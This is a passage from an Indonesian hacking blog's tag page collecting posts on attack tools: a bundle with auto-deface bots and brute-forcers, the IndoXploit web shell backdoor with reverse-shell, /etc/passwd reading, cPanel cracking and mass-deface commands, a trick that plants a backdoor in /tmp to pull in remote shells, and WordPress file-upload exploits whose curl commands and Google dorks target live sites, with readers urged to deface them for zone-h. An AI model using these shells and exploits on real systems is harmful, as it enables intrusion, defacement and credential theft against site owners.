Codes Xploit: tools
Pages
Showing posts with label tools. Show all posts
Showing posts with label tools. Show all posts

Realease Tools Pentester Mrcakil v2.1

 
hay guys :v cie berjumpa lagi sama cakil :v
cakil kali ini akan share tools pentester :v kali aja berguna buat kalian
langsung ae guys :v

Realease : kamis.07 Desember
author : Mr.cakil
thanks to : 4wsec - Mr.Tenwap
fiture ?
 01) Red Hawk
 02) D-Tect
 03) Hunner
 04) WPScan
 05) Webdav
 06) Metasploit
 07) Kali Nethunter
 08) Ubuntu
 09) Youtube Dl
 10) viSQL
 11) Weeman
 12) WFDroid
 13) FBBrute
 14) Ngrok
 15) Torshammer
 16) RouterSploit
 17) Hydra
 18) Weevely
 19) SQLMap
 20) Dirbuster
 21) admin finder
 22) lokomedia exploiter
 23) elfinder exploiter
 24) magento add admin exploiter
 25) scanner tools
 26) bing dorker
 27) katoolin
 28) arch linux
 29) linux fedora
 30) hash-buster
 31) sudo
 32) aircrack-ng
 33) joomscan
 34) bing-ip2hosts
 35) BlueMaho
 36) Bluepot
 37) honeypot
 38) bot auto deface 1
 39) bot auto deface 2
 40) mailer sender cli
 41) Wordpress Brute Force
 42) Oh-myzsh theme for termux
 43) instabot (instagram bot)
 44) exit

 berikut tampilan nya
nah gud kan :v
oh iya disitu ada 2 paket ya
tools (itu buat termux)
kalo yang tools2 (all linux) gnuroot ? insya allah

tester : termux/ ubuntu 17.10 / kali linux
langsung ae nih link nya bree
sini bang :v
kritik or saran monggo :)

Cara install Routersploit di Android menggunakan Termux - No root

 


Apa itu Routersploit?? Routersploit adalah tools linux yang bisa digunakan untuk exploitasi pada router guna mendapatkan password admin router tersebut tanpa melakukan bruteforce,



Tools ini berjalan pada OS linux tapi kali ini kita akan menjalankanya di android,
Untuk menjalankanya di android kita menggunakan aplikasi tambahan yaitu Termux

Yang belum tau apa itu termux bisa membacanya di

Scan Source Code Plugin WordPress dengan WPSploit

 
Scan Kode Plugin WordPress dengan WPSploit - Kali ini saya bakal sharing tips seputar WordPress. WPSploit adalah tools yang ditulis dengan bahasa python dan difungsikan untuk melakukan scanning terhadap source code plugins WordPress. Tujuannya tentu saja untuk mengaudit sumber kode tersebut untuk menghindari kode yang memiliki celah.
Read More

eMobileTracker.com - Trace Mobile Number - Mobile Number Tracker

 
Assalamualaikum. Haloooo, sudah lama tidak posting kembali, maaf karena saya sendiri sudah sibuk oleh kegiatan dunia nyata :v. Oke langsung saja, ke inti dari artikel ini.

Melacak nomor telpon? Ingin cari tau siapa orang dibalik nomor asing yang iseng ke nomor telpon kita? Yap, mungkin ini akan sedikit membantu buat anda!!


eMobileTracker.com adalah layanan yang dirancang khusus untuk Anda untuk Melacak Nomor Ponsel, Foto dan Lokasi Orang di seluruh dunia tanpa pendaftaran atau pendaftaran apapun. Kami menyediakan kemampuan untuk melacak jumlah ponsel di lebih dari 230 negara di seluruh dunia.

Dari deskripsi yang diberikan diatas oleh pihak eMobileTracker.com jelas bahwa penggunaan layanan ini sangat mudah sekali, kita hanya perlu mengunjungi halaman website tersebut lalu langsung saja memilih menu Track Mobile Number .

Pada Halaman ini anda cukup memilih kode negara dan juga isikan nomor telpon yang ingin kita trace.


Mungkin jika kalian memang orang yang sangat sulit percaya akan layanan gratis di internet pada awalnya pasti kalian tidak akan benar percaya apakah layanan ini akan berfungsi atau hanya sekedar trap belaka, atau mungkin fatalnya bisa saja ada malware pada layanan ini.

Yap benar, awalnya saya pun tidak akan percaya apakah ini berhasil atau tidak, namun karena penasaran saja, saya coba memasukan nomor telpon saya lalu saya coba Track Now dan hasilnya adalah sebagai berikut.



Wuutt? Bagaimana dia bisa tau nama dari Nomor telponnya?

Saya sendiri baru saja menggunakan layanan ini, masih belum dapat penjelasan bagaimana layanan ini bisa mengetahui nama/pemilik dari nomor telpon yang awal tadi kita input kan. Yang jelas setelah kita input nomor, data nomor telpon kita akan masuk kedalam log mereka seperti gambar awal diatas.

Sayangnya, layanan ini tidak secara akurat memberikan informasi dimana lokasi (kota/provinsi) dari pemilik nomor telpon, layanan ini hanya dapat memberikan informasi dari Negaranya saja. Namun yang jelas, cukup bagus juga untuk mengetahui orang orang yang iseng. Silakan mencobanya sendiri :D

Ya, sekian dulu dari saya, baru ada waktu untuk buat artikel lagi, mungkin kalian bisa mendiskusikannya bagaimana layanan ini mengambil informasi nama anda dari nomor telpon.

Simple Tools for Website Information Gathering

 
Halo, kali ini saya akan membagikan sebuah tools sederhana yang digunakan untuk Information Gathering sebuah website. Tools ini akan otomatis mengambil informasi:

- IP Address
- Hostname
- NameServer & Mail Server
- Scan Range IP 1-255 dan deteksi Hostname dari tiap IP nya.


Tools ini dibuat dengan bahasa program BASH. Jadi jika kalian menggunakan OS Windows, installah bash terlebih dahulu, akan mudah jika kalian menggunakan Windows 10 yang sudah terintegrasi Bash Ubuntu. 





Cara menggunakan:
------------------------------------------
user@linux $ wget https://pastebin.com/raw/5njuKAZ1 -O file.sh
user@linux $ chmod +x file.sh
user@linux $ ./file.sh
------------------------------------------

Oke sekian dulu.

Install SQLMAP di Android Dengan Termux

 


Hallo gan sesuai janjiku di Artikel kemarin Download Termux - Linux On Android yaitu Install SQLMAP di Android Dengan Termux,


Apa itu Sqlmap?
SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi
proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan
mengambil alih server database. [IDCA]
Baca Juga


Tutorial Deface With Sqlmap And Acunetix
Tutorial Deface

Download Termux - Linux on Android

 




Selamat Pagi gan, sudah lama gak pernah Update, hehe. Maklum PC Lagi rusak.
Langsung saja ya gan kali ini mau update tentang aplikasi Terminal emulator untuk android yaitu Termux.

Termux adalah terminal atau shell emulator untuk Android yang berguna untuk menjembatani interaksi antara pengguna dan sistem operasi dengan antarmuka baris perintah. Seperti Konsole atau Gnome-Terminal pada Linux

Bypass 406 & Auto Delete Shell Oleh Server Dengan TMP Shell by IndoXploit

 
Oke kali ini gua pengen share sedikit trik, bagaimana membypass sebuah server yang 'bikin jengkel' waktu upload shell-shell besar seperti (indoxploit shell, wso, b374k, c99, dll). Yap Not Acceptable.

Mudah saja untuk mengakalinya.
Write sebuah file backdoor ke dalam directory /tmp, lalu panggil shell itu melalui current directorynya dengan sebuah PHP Function 'include()'
Penjelasan lebih lanjut.

Disini, saya sudah membuat backdoor khusus agar lebih mudah memanggil backdoor lain yang kita inginkan.

Source: https://pastebin.com/z8WiCv3S

Ubah bagian $URL, isilah dengan URL Shell Backdoor yang kalian inginkan.

Langsung saja buka file backdoornya.
 Jika backdoor TMP Shell terus-menerus redirect & menghasilkan blank page. Itu tandanya file backdoor yang dipanggil tidak berhasil di Write pada directory /tmp.
Oke sekian dulu.
Semoga Bermanfaat.

Tutorial Symlink, Crack Cpanel, Mass Password Change Dengan IndoXploit Shell V.3

 
Halooo, bagi kalian yang masih bingung untuk jalanin fitur-fitur di indoxploit shell v3, kalian bisa simak video tutornya.




IndoXploit Shell V.3 Bisa kalian Download Disini:
=> http://www.indoxploit.or.id/2017/06/indoxploit-shell-first-edition-v3.html


Thanks to:
BAHARI TROUBLE MAKER

IndoXploit Shell First Edition [ V.3 ]

 
Haloo, selamat malammm.
Kali ini kita akan share lagi shell backdoor indoxploit. Kali ini kami tambah beberapa fitur-fitur baru yang sebelumnya tidak ada di indoxploit shell, tentu serta beberapa perubahan bentuk shell dan lainnya. Oke Langsung saja disimak.

IndoXploit Shell V.3 menggunakan 'Command Based' atau bisa dibilang untuk menjalankan beberapa tools/fiturnya, kalian harus memasukan command tertentu.

Contoh command untuk memanggil tools 'Adminer'


Login Shell, default password: IndoXploit

 [ List Tools - IndoXploit Shell Backdoor V.3 ]

=============================================
**** COMMAND BASED *****
 - Read File
 usage: rf [filename]
 example: rf /etc/passwd

 - Spawn File/Tools 
 usage: spawn [name]

 [name]
- Adminer (adminer)
 - WebConsole (webconsole)
 - CGI Telnet 1 (cgitelnet1)
 - CGI Telnet 2 (cgitelnet2)
 - PHPINFO (phpinfo)

 example:
 spawn adminer
 spawn webconsole
 spawn cgitelnet1

Jumping
usage: jumping

Config Grabber
usage: idxconfig

 - Symlink 
 usage: symlink

 - Reverse Shell 
 [Back Connect]
 usage: rvr bc [IP] [PORT] [TYPE]
 example:
 rvr bc 127.0.0.1 1337 bash
 rvr bc 127.0.0.1 1337 perl

 [Bind Port]
 usage: rvr bp [PORT] [TYPE]
 example:
 rvr bp 1337 perl

 - KRDP - Create RDP Account (for windows server only) 
 usage: krdp

 - Logout From Shell
usage: logout

 - Kill Backdoor 
usage: killme
=============================================
- Mass Password Change
- Fake Root
- Cpanel Crack
- Mass Deface/Delete File
- Zone-H Mass Submit



#Link Download: 
http://server.indoxploit.or.id/indoxploit_v3.txt

###############################################################################
Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.

Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
Tanpa kalian kita tidak akan BESAR seperti sekarang.

Greetz: 
All Member IndoXploit. & All My Friends.
###############################################################################
Special Thanks: 
Depok Cyber Security | Sanjungan Jiwa | 0x1999
###############################################################################

WordPress Plugin Job Manager File Upload

 
Exploit Title: WordPress Plugin Job Manager File Upload
Google Dork: inurl:/wp-content/uploads/job-manager-uploads/
Vuln Path: /jm-ajax/upload_file

Example:
www.target.com/jm-ajax/upload_file/
( Vuln Target )

Exploit:
1. CSRF

2. CURL POST
root # curl -k -F "file=@shell.gif" "http://target.com/jm-ajax/upload_file/"


Upload file anda dengan format .gif/.jpg/.png





Script:
https://pastebin.com/hp0jJr1g [PHP][CLI Based]
https://pastebin.com/FaACEDLg [BASH]


Ayo kawan kita boom zone-h sebelum dir upload di banned lagi.

WordPress Business Directory Plugin File Upload

 

Exploit Title: WordPress Business Directory Plugin File Upload
Author: Jingklong ( Bahari Trouble Maker )



Google Dork: inurl:/wp-content/ inurl:/business-directory-plugin
Vuln Path: /wp-admin/admin-ajax.php?action=wpbdp-file-field-upload

Example Target:
http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload

( Vuln Target )
Exploit:
1. CSRF


2. CURL POST
root # curl -v -k -F "file=@shell.gif" "http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload"

Uplod file anda dengan format .gif/.jpg/.png

Hasil upload anda bisa dicari di:
http://target.com//wp-content/uploads/2017/06/shell.gif


Download:
Auto Exploit (BASH): https://pastebin.com/Wk904pU9


Oke, selamat mencari target :D

Tools admin finder - Python script

 
Hola~ welcome back sama el,berhubung ini bulan puasa el dan segenap Member XaiSyndicate Team mengucapkan "Selamat Menjalankan Ibadah Puasa" bagi yg menjalankan -/\-
Di postingan gw kali ini,gw mau share tools admin finder

Bahan bahan disini cuk~

Script admin findernye
Wordlist admin pagenye

Oke ya mungkin semoga membantu buat Player SQL yg kadang bingung buat find adminya..

klw bingung cara pakenya,bisa liat vidionya disini :v jangan lupa buat like & subscribe >:(
Here~

Thank's to XaiSyndicate - spesial thank's to AZZATSSINS yg bikin script ini :'v

Sekian buat Entri gua kali ini ~ wassallam

Cara Membuka situs terlarang di Android dengan Hola Free VPN

 


Hola Free VPN adalah salah satu aplikasi yang sudah sangat populer di PC maupun di Android,karena dengan hola kamu bisa
mengakses situs yang di blokir,ataupun bisa mengakses situs di berbagai
negara tertentu.
Dengan Hola Free VPN kamu bisa mengubah/mengatur negara
pilihan kamu sendiri,negara yang di sediakan pun banyak dan hampir
lengkap untuk kamu browsing ke negara lain.


Fitur

Install Nmap dan Netstat di CentOS 7

 
Oke kali ini share sedikit tutorial instalasi Nmap dan Netstat di CentOS 7. Secara default kedua tools tersebut memang belum terinstall di CentOS 7. Hal ini baru saja saya alami ketika menyewa server baru tadi pagi. Nah berhubung kedua tools tersebut sangat penting, terutama untuk menganalisa servis yang berjalan di port tertentu dan melihat port mana saja yang terbuka, saya juga merekomendasikan teman teman menginstall tools tersebut.
Read More

Download Kumpulan Aplikasi Android Keren Yang Tidak Ada Di Google Playstore

 


Anda pasti tidak asing lagi dengan google playstore, Ditoko aplikasi google ini bisa download berbagai macam aplikasi android, bukan karena hanya gratis aplikasi yang di google playstore juga di claim aman,

tapi gak semua aplikasi keren sukses masuk ke google playstore, ada beberapa aplikasi android terlarang keren yang tidak bisa masuk ke toko google playstore, beberapa aplikasi keren ini

[ Download ] IndoXploit Shell First Edition V.2

 


Oke gan kali ini saya mau berbagi shell dari IndoXploit yang menurut saya keren, karena shell nya simpel, ringan dan fiturnya di buat auto auto, jadi sangat memudahkan kita mengesekusinya.

Langsung saja ya gan gak usah panjang lebar,

Berikut tampilanya.


Tampilan Login



Tampilan Menu


Untuk Fitunya sebagai berikut:
Fitur:
K-RDP Shell

Fitur untuk membuat Akun RDP yang dapat digunakan

WordPress HASH Decrypter Tools

 
Okee, selamat sore kawan. Kemarin gua share sedikit tips sederhana bagaimana mendecrypt  sebuah hash hasil fungsi cyrpt dan password_hash pada PHP. Contohnya adalah seperti ini $1$bcl63GxF$FkUtrx6OxdSusl6aTLnYR . Kalian bisa cek artikelnya disini http://www.indoxploit.or.id/2017/03/simple-way-to-decrypt-hash-from-crypt.html.

Oke, kali ini gua akan membahas hal yang sama yaitu mendecrypt hash lagi. Tapi jenis hash apa kali ini?

Karena banyaknya orang yang merequest dan bingung bagaimana memecahkan hash dari CMS WordPress. Kali ini akan gua share tips sederhananya :D

CMS WordPress merupakan salah satu cms yang menggunakan proses hashing yang rumit dalam mengamankan passwordnya. Tidak seperti CMS lain yang rata-rata masih memakai MD5/SHA1.

Oke tidak usah banyak bicara, kita langsung masuk ke pembahasan saja.

( Jalankan di Terminal/CMD [ CLI Based ] )

Kalian lihat bagian ini:
[+]$P$Bd2v1uNoAchuGhnGiwFdS52wmk5.8X0 -> indoxploit (OK)

itu tandanya Hash tersebut sesuai dengan kata 'indoxploit'

Kalian Bisa Mendapatkan Tools ini di Github.
https://github.com/agussetyar/wpdecrypt

Atau bisa Mendownloadnya:
git clone https://github.com/agussetyar/wpdecrypt.git


Oke sekian dulu, semoga bermanfaat :D

Simple Way to Decrypt HASH from Crypt, password_hash Function Using Dictionary Attack

 
Haloooo, selamat malam semua. Dalam kesempatan kali ini gua akan sedikit share trik sederhana/mudah untuk men-decrypt sebuah hash dari fungsi crypt dan password_hash

Sebelumnya, apakah kalian pernah melihat hash seperti ini sebelumnya??
$1$FHBWvpjf$ldIqxhnMjPVoJgScwiDp1/
- $2y$10$BxO1iVD3HYjVO83NJ58VgeM4wNc7gd3gpggEV8OoHzB1dOCThBpb6
- $2y$10$dEuDeZsaw2QVJqERAjivtu2/FttjoW2KLHdZWsDfBR.ZYxCJFH9ha

Pernah kalian lihat?
Yap, itu merupakan hasil hashing dari fungsi crypt dan password_hash

Nah, dalam artikel kali ini. Saya akan memberikan tips sederhana bagaimana mendecrypt hash tersebut. Walaupun tidak pasti 100% berhasil, tapi setidaknya ini akan sedikit membantu.

Script: http://pastebin.com/Sn19ShVX

Cara Pakainya:
(Jalankan di Terminal/CMD [CLI Based] )

Di gambar tersebut kalian melihat bagian:
[+] $2y$10$BxO1iVD3HYjVO83NJ58VgeM4wNc7gd3gpggEV8OoHzB1dOCThBpb6 -> indoxploit (OK)

Itu tandanya, hash tersebut sesuai dengan kata 'indoxploit'

Kalian bisa mencobanya sendiri dengan membuat hash seperti diatas dengan fungsi crypt atau password_hash pada PHP . Dan kalian bisa mencoba tools decrypter simple ini untuk membuktikannya.
Proses nya tergantung dari berapa banyaknya wordlist kalian.

Oke sekian dulu tutorialnya, semoga bermanfaat.

Referensi:
http://php.net/manual/en/function.password-hash.php
http://php.net/manual/en/function.crypt.php
http://php.net/manual/en/function.password-verify.php

Mongoaudit - MongoDB Auditing and Pentesting Tool

 
Kembali lagi kali ini kita membahas masalah security. Yup, kita akan membahas mengenai Mongoaudit, GUI tool yang berguna untuk melakukan audit keamanan di MongoDB mu. Hal ini tentu akan bermanfaat karena kita jadi tau tindakan apa yang akan diambil selanjutnya.
Read More
Subscribe to Newsletter

Popular Posts

© Copyright 2017 Codes Xploit. Designed by Infinite Haxor. Distributed by Infinite Haxor.